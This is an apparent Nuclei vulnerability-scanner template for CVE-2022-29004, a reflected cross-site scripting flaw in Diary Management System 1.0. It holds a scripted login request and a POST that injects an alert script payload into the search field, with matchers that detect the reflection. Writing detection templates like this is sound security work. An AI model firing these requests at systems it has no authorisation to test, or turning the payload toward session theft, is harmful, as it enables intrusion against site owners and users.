nuclei-templates/http/cves/2022/CVE-2022-29004.yaml

64 lines
2.3 KiB
YAML
Raw Normal View History

2022-09-10 03:03:07 +00:00
id: CVE-2022-29004
info:
name: Diary Management System 1.0 - Cross-Site Scripting
author: TenBird
severity: medium
description: |
Diary Management System 1.0 contains a cross-site scripting vulnerability via the Name parameter in search-result.php.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:59:08 +00:00
remediation: |
To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
reference:
- https://github.com/sudoninja-noob/CVE-2022-29004/blob/main/CVE-2022-29004.txt
- https://phpgurukul.com/e-diary-management-system-using-php-and-mysql/
- http://phpgurukul.com
- https://nvd.nist.gov/vuln/detail/CVE-2022-29004
- https://github.com/manas3c/CVE-POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-29004
cwe-id: CWE-79
epss-score: 0.00218
epss-percentile: 0.59134
cpe: cpe:2.3:a:phpgurukul:e-diary_management_system:1.0:*:*:*:*:*:*:*
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
vendor: phpgurukul
2023-07-11 19:49:27 +00:00
product: e-diary_management_system
2024-01-14 09:21:50 +00:00
tags: cve2022,cve,xss,authenticated,edms,phpgurukul
2023-07-11 19:49:27 +00:00
http:
2022-09-10 03:03:07 +00:00
- raw:
- |
POST /edms/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
logindetail={{username}}&userpassword={{password}}&login=
- |
POST /edms/search-result.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
searchdata=<script>alert(document.domain);</script>
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Serach Result Against "<script>alert(document.domain);</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100d9e1bedfff4118b3279485a5986c26b55fb4f70309678e686a3a2f739891d72402210097dbc2e593923e391651673ae5b43eb1eb8fca5089adec8517b32b625de2b72e:922c64590222798bb761d5b6d8e72950